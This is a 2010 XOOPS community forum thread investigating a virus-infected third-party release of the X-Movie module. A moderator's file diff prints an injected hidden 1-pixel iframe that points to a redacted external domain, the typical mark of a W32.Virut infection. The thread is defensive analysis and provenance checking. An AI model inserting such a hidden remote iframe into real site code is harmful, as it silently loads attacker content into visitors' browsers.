1
Mamba
X-Movie Virus?
  • 2010/5/26 6:40

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


Originally in this thread

@ Peekay
Quote:
wishcraft wrote:

Quote:
What about X-Movie 3, mamba if your so nice why has the guy installed 4 virus and php trigger code in it, that i had to remove..


Sorry to back-track a little, but this module appears to be in the module repository. Does it contain a virus?

I am confused with the whole story.

I downloaded X-Movie 3.11 from the link that Wishcraft gave in his article.

Then I downloaded the original 3.0 from Optikool website and the 3.0 from our Module Repository, which is identical to the one from Optikool Website.

My Virus scanner (Microsoft Security Essentials) didn't find any viruses in any of the files.

Then I used WinMerge to compare the files from Wishcraft's 3.11 and the ones in 3.0 from our repository.

Resized Image

The dates for the binary files do differ, with Wishcraft's files being older. Didn't have time to check on the differences there.

The changed text files are (and the changes):

1)
admin_header.php
class.Thumbnail.php
submit.php
tpl_embedcode.php
tpl_imgtype.php
tpl_movietype.php
tpl_player.php

Line 1: changed from <? to <?php

2)

blocksadmin.inc.php

Line 86 (Wishcrafts code includes iframe):
From:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table></body></html>';


To:
//  $dummyhtml = '<html><head><meta http-equiv="content-type" content="text/html; charset='._CHARSET.'" /><meta http-equiv="content-language" content="'._LANGCODE.'" /><title>'.$xoopsConfig['sitename'].'</title><link rel="stylesheet" type="text/css" media="all" href="'.getcss($xoopsConfig['theme_set']).'" /></head><body><table><tr><th>'.$myblock->getVar('title').'</th></tr><tr><td>'.$myblock->getContent('S', $bctype).'</td></tr></table><iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>
</body></html>';


Please note the link to a web site XXX.pl in Wishcrafts' code (I've changed the name so it won't show here, but you can see it in the original file)

3)
myheader.php
Line 61:

From:
</td></tr></table></body></html>

To:
</td></tr></table>
</
body></html>


4)
xoops_version.php

Lines 31 and 33 (changing version number and adding his name)

From:
$modversion['version'] = 3.0;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com)";

To:

$modversion['version'] = 3.11;
$modversion['description'] = _MI_X_MOVIE_DESC;
$modversion['credits'] = "Dana Harris (http://www.optikool.com), wishcraft.";


So it seems like the Wishcraft'o changes are cosmetics, there was no "php trigger code" removed, and then iframe has been actually added in Wishcraft's code.

Can somebody confirm it?

Wishcraft, did you uploaded the correct files? If not, could upload the correct ones, and tell us which "php trigger code" has been removed from the Optikool's original files?
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

2
Burning
Re: X-Movie Virus?
  • 2010/5/26 7:14

  • Burning

  • Theme Designer

  • Posts: 1163

  • Since: 2006/8/22


hi'

Virus found on wishcraft version was W32.Virut!html. File contamined was : x_movie/myheader.php

I found it 2010-05-16 and alert Simon immediatly via MSN. He sent me a new version, virus was removed.


To be sure and after Peekay question, I have scanned (with same program Norton 2010) Optikool version : no virus.


So, no more virus :)
Still learning CSS and... english

3
Mamba
Re: X-Movie Virus?
  • 2010/5/26 7:23

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


But which X-Movie files originally contained the virus?

Files that came from Optikool, or files that you received from Wishcraft (or somebody else)?

Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

4
ghia
Re: X-Movie Virus?
  • 2010/5/26 7:39

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


I downloaded xoops2_mod_x_movie_3_optikool.zip in december 2009 with latest file date 20 mai 2009.
This does not include the iframe.
Current version on the site of Optikool is xoops2_mod_x_movie_30_optikool.zip dated march 2010, but the files are identical.

It looks as WishCrafts' PC was infected.

5
Peekay
Re: X-Movie Virus?
  • 2010/5/26 9:48

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Thanks mamba and others for responding
Quote:
<iframe style="height:1px" src="http://www.XXX.pl/rc/" frameborder=0 width=1></iframe>

I am glad there is no virus, but why add the iFrame.
Just a test, or to track usage of the module?

I appreciate it may have been an error, but you don't want remote links embedded in a module. I found one recently in a module I'm updating. I am confident it was overlooked by the original developer after some initial testing, but the site still set a cookie on my PC.
A thread is for life. Not just for Christmas.

6
Mamba
Re: X-Movie Virus?
  • 2010/5/26 10:11

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


As Ghia said, it seems like his PC was infected, and he uploaded the infected files as part of the the Zip file.

What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release. I hope, this was just a wrong upload, and there is another version somewhere on his computer with same more significant changes...
Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

7
ghia
Re: X-Movie Virus?
  • 2010/5/26 12:07

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Quote:
I found one recently in a module I'm updating.
Can you inform us which one, so we can verify it in our repostitory?
Quote:
What I don't understand is how 8 cosmetic changes, as shown above, would justify a new version release.
As I believe Optikool is still maintaining its site and modules, errors and other needed changes should be reported to him and not released by third parties as new versions.
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.
Furthermore I believe an edit of the article is apropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.
Quote:
x-Movie 3.11

* Virus Removed
* Embedded Virus Trigger Removed
* Helpers Updated
* Icon Updated
* Version Changed

8
Peekay
Re: X-Movie Virus?
  • 2010/5/26 12:26

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


@ghia

I have been updating Catads, based on Catads 1.522 FINAL from TDM Xoops. I posted an alert to beta testers about the URL in this thread. I don't think that particular module was available in the module repository.

@ mamba

OK. Thx. I suppose if your site (or PC) is compromised the attackers will try and hide malicious code and you may not even know about it. Hopefully Wishcraft will amend the release and remove the iFrame SRC.

If there is no evidence to suggest that Opticool allowed a virus to be included in the previous version, I too think it fair that the release notes are changed.

A thread is for life. Not just for Christmas.

9
Mamba
Re: X-Movie Virus?
  • 2010/5/26 21:29

  • Mamba

  • Moderator

  • Posts: 11366

  • Since: 2004/4/23


Ghia,
Quote:
If no features are added to make a kind of new module out of it, one should not take over existing and actively maintained modules.

Even if it is not actively maintained, only new added features should justify a new version.

Quote:
Furthermore I believe an edit of the article is apropriate and the following paragraph should be removed as I feel this does injustice to Optikool and his modules.

I agree. The paragraph has been removed.

Support XOOPS => DONATE
Use 2.5.10 | Docs | Modules | Bugs

10
optikool
Re: X-Movie Virus?
  • 2010/6/17 17:10

  • optikool

  • Not too shy to talk

  • Posts: 154

  • Since: 2007/3/26


Hey Guys,

I just ran into this thread and wasn't aware that there was a virus version of this module floating around on the net.

@Peekay Generally a cracker would add an iframe to a page so that they could send information back and forth between their server and the page you are viewing. Things like passwords would be the most common info to send. The module that I maintain would not have any need for iframes so if you find one, remove it.

Later this year I'm planning to revisit this module so that I can redesign different aspects to take advantage of new ways of doing things and improve the code. If you see problems with this module let me know and I will look into it.

Also the reason why the publish date changed on the module was because I changed to the Joomla CMS and had to move things over. Sorry Xoops People but I needed to understand the MVC module better and Joomla has that module. But I plan to bring the techniques I learned from creating my XGallery component and what I learn from my Movie component, (still in Alpha, but you can see it on my website) to the Gallery 2 and X Movie modules that I maintain for Xoops. Hopefully it will be a big improvement in the end.

Login

Who's Online

181 user(s) are online (113 user(s) are browsing Support Forums)


Members: 0


Guests: 181


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits